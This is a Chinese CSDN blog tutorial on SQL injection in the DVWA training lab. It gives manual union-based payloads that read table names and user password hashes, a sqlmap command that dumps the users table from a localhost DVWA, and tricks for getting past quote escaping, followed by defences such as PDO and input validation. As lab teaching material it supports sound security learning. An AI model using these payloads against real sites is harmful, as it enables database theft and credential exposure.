DVWA-WEB漏洞系列之SQL注入

最新推荐文章于 2024-05-16 15:44:40 发布
最新推荐文章于 2024-05-16 15:44:40 发布
阅读量3.3k 收藏 30
点赞数 5
文章标签: sql 数据库 mysql 网络 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/woo233/article/details/126180845
版权

1. SQL注入原理和流程

攻击者在HTTP请求中注入恶意的SQL代码,服务器使用参数构建数据库SQL命令时,恶意SQL被一起构造,并在数据库中执行。
在这里插入图片描述
输入恶意的sql语句导致原有的sql语句被改变
在这里插入图片描述
在这里插入图片描述
输入一段sql语句导致原有的开发者写的sql语句发生改变。
在这里插入图片描述

DVWA之SQL注入漏洞

(1)low级别
在这里插入图片描述

query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";

$id是用户输入内容

如何判断存在sql注入漏洞:
用户输入数据为 1’ and 1=1#,这时SQL语句发生变化,在原有查询完成后会判断 1=1,如果判断正确则才会有输出[#作用是注释(移除)后续SQL语句]
在这里插入图片描述
想要拿到数据库中的用户数据过程:
1.判断数据库的列数
order by
在用户输入中依次增加order by后面的数据,当在输入为 1’ order by 3#时网页出现报错,证明该数据库有2列/字段
在这里插入图片描述

在这里插入图片描述
2.联合查询其他信息 union select [sql1] [sql2]
SELECT first_name, last_name FROM users WHERE user_id = ‘1’ union select user(),database()#’;
用户输入SQL语句,执行了Mysql内置函数user()和database()
user():返回当前数据库连接用户
database():返回当前数据库名称
在这里插入图片描述
3. 联合查询表

union select table_name,table_schema from information_schema.tables where table_schema='[database_name]'

一个数据库可以看作多个excel表
在DVWA中输入图片中红色代码,从information_schema数据库中查询dvwa数据库表
在这里插入图片描述
出现如下图画面,表示DVWA中有2个表,一个为guestbook,另一个users
在这里插入图片描述

1' union select 1,column_name from information_schema.columns where table_name='users'#
  1. 联合查询信息 union [query_sql]
SELECT first_name, last_name FROM users WHERE user_id = '1' union select user,password from users#'

在dvwa中low级别的对话框中输入1’ union select user,password from users#出现结果如下图所示。
在这里插入图片描述

SQLmap

SQLmap官网:https://sqlmap.org/
下载方法:
1.可下载源代码,直接使用python运行sqlmap.py
2.安装kali,自带sqlmap,可以直接输入sqlmap执行

SQLmap自动化SQL注入利用过程一般如下
第一步:检测漏洞
在这里插入图片描述
出现下图的结果,说明存在sql注入漏洞
在这里插入图片描述
第二步 获取数据库名
在这里插入图片描述
出现结果如图所示:
在这里插入图片描述
第三步:获取指定数据库表
在这里插入图片描述
出现结果如图所示:
在这里插入图片描述
第四步:获取指定数据库列/表项
在这里插入图片描述
在这里插入图片描述

第五步:获取数据

python sqlmap.py -u "http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=4448pso2ucg5bhs3k874h3n9j5; SL_G_WPT_TO=zh; SL_GWPT_Show_Hide_tmp=1; SL_wptGlobTipTmp=1; security=low" -D dvwa -T users --dump

直接读取users表中的所有数据,可用–dump
在这里插入图片描述
结果如图所示:
在这里插入图片描述

在这里插入图片描述

SQL注入防御

防御命令执行的最高效的方法,就是过滤用户输入内容,不让输入sql语句

(1)DVWA medium转义了特殊字符
在这里插入图片描述

列如:将

SELECT first_name, last_name FROM users WHERE user_id = '1' union select table_name,table_schema from information_schema.talbes where table_schema='users'#'

变为了

SELECT first_name, last_name FROM users WHERE user_id = '1\' union select table_name,table_schema from information_schema.talbes where table_schema=\'users\#'

在输入的’前面都添加了一个\,SQL语句中不存在 \ 这个符号
在这里插入图片描述
渗透测试解决上面的防御方法:
在输入的内容中避免特殊字符的存在

把带‘’的地方进行等价替换,如将’dvwa’ 替换为database()
在mysql中对于查询的value可替换为16进制,如将’dvwa’ 替换为 0x64767761

(2)SQL注入防御high
对于输入长度做了限制
在这里插入图片描述
但缺少传入数据的过滤,无法防御注入漏洞.

SQL注入的防御 impossible级别
防御SQL注入:使用PDO,配合正确的过滤和sql语句就可避免SQL注入漏洞的产生
在这里插入图片描述
(a)过滤
限制输入内容必须为数字
在参数绑定中避免了其他语句的产生
在这里插入图片描述

wow2ok
关注
  • 5
    点赞
  • 30
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
DVWA亲测SQL注入漏洞
YWBOY-小忘-安全菜鸟-Web狗
08-09 568
介绍: 关于sql注入的基础知识,我上篇文章也写过了,这篇就用靶机的漏洞环境来实践操作一下,所谓实践出真理嘛,我们这次试用的漏洞平台是DVWA,Github下载地址:DVWA 关于一下注入的基本知识或者姿势,我会在实践中详解。 实验: LOW等级 先输入1看一下 我们在加个单引号 这里的搜索框为什么没有显示单引号呢?因为被url编码了 一般的url编码其实就是那个字符的ASCII值得十六进制,...
通过DVWA学习SQL注入漏洞
热门推荐
Mi1k7ea
02-21 2万+
此篇文章作为本人的学习小笔记,有任何不足之处望各位大牛多多指教~ SQL注入漏洞作为OWASP TOP10中重要的一部分,可见其安全性的危害有多大。简单地说,SQL注入就是通过构建特殊的具有SQL语法的语句,绕到数据库中进而执行相应的操作的漏洞。关于SQL注入更多的描述就不再多说了,网上资料也很多,下面就直接上笔记。 基于报错的检测方法: 各种符号以及组合: ‘  “  (  %
DVWA平台搭建+SQL注入实验详解
二狗的博客
04-04 5974
实现DVWA平台的搭建,为后续的SQL注入提供练习环境;进行SQL注入的练习,目的是了解因web应用程序对用户输入数据的合法性没有判断或过滤不严,而造成的危害,以便后续更好地掌握对其的防御手段,提高网络安全意识;
SQL 注入 DVWA 实验
m0_63645854的博客
04-10 2061
SQL注入与自动注入
DVWA通过攻略之SQL注入_dvwa sql注入
最新发布
2401_84968101的博客
05-16 646
此方法是在页面没有显示位,但是echo mysql_error();函数输出了错误信息的时候方能使用。优点是注入速度快,缺点是语句较为复杂,而且只能用limit依次进行猜解。总体来说,报错注入其实是一种公式化的注入方法,主要用于在页面中没有显示位,但是用echo mysql_error();输出了错误信息时使用。注入过程:第一步:SQL注入点探测。探测SQL注入点是关键的一步,通过适当的分析应用程序,可以判断什么地方存在SQL注入点。
SQL 盲注 实验
m0_63645854的博客
04-10 410
通过手工 SQL 盲注分别完成 DVWA 的 Low,Medium,High 级别的 SQL 盲注实验。在文本框输入1' and 1=2#,不能正常访问数据,注入点为字符型。第一个字符为d,按照上一步的方法,逐个猜解出整个数据库名:dvwa。拦截数据包后,第一个数据包正常放行,修改第二个数据包,在。DVWA 的 Medium 级别的 SQL 盲注实验。按照上一步的方法,逐个猜解出整个数据库名:dvwa。按照上一步的方法,逐个猜解出整个数据库名:dvwa。(4)确认当前数据库名的第一个字符。
DVWA靶场通关(SQL注入
m0_56010012的博客
03-09 1万+
SQL Injection(SQL注入)概念 就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意)的SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。 SQL注入漏洞的危害是巨大的,常常会导致整个数据库被“脱裤”,尽管如此,SQL注入仍是现在最常见的Web漏洞之一。 手工注入常规思路
DVWA通过攻略之SQL注入
勿山几已
05-24 8545
简单介绍SQL注入,演示手工进行SQL注入及利用sqlmap进行自动化SQL注入
DVWA靶场之SQL注入通关详解
qq_62169455的博客
06-27 3303
获得字段中的数据,使用查询语句:1 or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #。获取表中的字段名,当输入查询语句(1 union select 1,column_name from information_schema.columns where table_name='users')后,会发现报错了,原因是语句中含有单引号。
DVWA-master.zip
01-04
在DVWA的"SQL注入"部分,你可以尝试通过构造恶意输入来操纵数据库查询,以获取敏感信息或执行非授权操作。这涵盖了盲注、时间基注入和错误回显等多种方法,有助于理解SQL注入的危害和防御手段。 3. **跨站脚本...
DVWA-master.7z 压缩包
09-14
DVWA(Damn Vulnerable Web Application)是一个开源的Web应用程序,设计用于帮助安全专业人员测试他们的安全技能和工具,同时也为开发人员提供一个平台来了解常见Web应用漏洞的本质。这个"DVWA-master.7z"压缩包...
DVWA-master安装包
02-28
1. **注入漏洞**:包括SQL注入、命令注入等,通过在用户输入的数据中插入恶意代码,攻击者可以获取数据库信息甚至控制服务器。 2. **跨站脚本(XSS)**:分为反射型和存储型两种,XSS允许攻击者通过注入可执行的...
DVWA靶场SQL注入(low)
qq_61975388的博客
08-17 585
DVWA靶场SQL注入实战
渗透测试实验_在kali Linux 2021环境下使用sqlmap对DVWA进行sql注入
weixin_47133613的博客
04-06 7882
文章目录1. sqlmap是什么2. 启动kali Linux ,进行sqlmap更新3. 启动phpStudy,启动火狐浏览器代理,运行BurpSuite4. 如果sqlmap出现404或者返回test的报错,可以尝试重置DVWA,重启phpStudy5. 选择安全等级“Low”,点击“SQL Injection”,通过报文中的url和cookie构造sqlmap命令获取信息5.1 获取数据库5.2 获取dvwa数据库中的表名5.3 获取dvwa库中users表中的列名5.4 获取dvwa库中users表
网络渗透测试实验3:SQL注入(DVWA+SQLmap+Mysql注入实战)
zzzfff__的博客
11-21 1832
实验环境搭建。启动Metasploitable2虚拟机。1.输入账号密码【msfadmin】,输入【ip a】查询ip2.打开浏览器,输入该ip,进入DVWA输入账号密码:admin,password。账号密码使用nmap穷举,见我的另一篇博客3.注入点发现。首先肯定是要判断是否有注入漏洞。在输入框输入1,返回ID: 1返回正常;
Web漏洞分析(dvwa、SQL手工注入sqlmap注入)
王陈锋的博客
11-07 3484
借助Web漏洞教学和演练的开源工具DVWA,学习并了解Web漏洞(以SQL注入为例)的原理及利用,验证SQL注入漏洞的实现过程及结果,并思考应对web漏洞风险的策略与手段。1、操作系统:windows 7/8/10等2、开发环境:DVWA。
数据库——SQL注入攻击
weixin_49816179的博客
01-05 1335
讲解SQL注入攻击的原理,讲解基本SQL注入攻击的方法,讲解防SQL注入攻击的基本措施。
SQL注入攻击的原理、分类和防御方法
Andrew的博客
02-27 2万+
一.SQL注入攻击原理 恶意用户在提交查询请求的过程中将SQL语句插入到请求内容中,同时程序本身对用户输入内容过分信任而未对恶意用户插入的SQL语句进行过滤,导致SQL语句直接被服务端执行。   二.SQL注入攻击分类 (1)注入点的不同分类 数字类型的注入 字符串类型的注入 (2)提交方式的不同分类 GET注入 POST注入 COOKIE注入 HTTP注入 (3)获取信息的方...
Hetian lab Day 9 DVWA一:SQL注入
喵喵喵
08-03 606
文章目录背景介绍实验环境实验目的实验步骤步骤一步骤二步骤三课后习题分析与思考参考文档 背景介绍 微软对SQL注入的介绍: 脚本注入式的攻击 恶意用户输入用来影响被执行的SQL脚本 SQL注入产生的直接原因是拼凑SQL,实质就是将恶意的SQL代码注入到特定字段用于实施拖库攻击等。 防御方式主要有三种: 字符串检测:限定内容只能由英文、数字等常规字符,如果检查到用户输入有特殊字符,直接拒绝。但缺...
DVWA——SQL注入
m0_74426634的博客
04-07 1029
日前,国内最大的程序员社区CSDN网站的用户数据库被黑客公开发布,600万用户的登录名及密码被公开泄露,随后又有多家网站的用户密码被流传于网络,连日来引发众多网民对自己账号、密码等互联网信息被盗取的普遍担忧。网络安全成为了现在互联网的焦点,这也恰恰触动了每一位用户的神经,由于设计的漏洞导致了不可收拾的恶果,验证了一句话“出来混的,迟早是要还的”,所以介绍一些常用的攻击技术和防范策略。SQL Injection也许很多人都知道或者使用过,如果没有了解或完全没有听过也没有关系,因为接下来我们将介绍SQL Inj

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

wow2ok

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值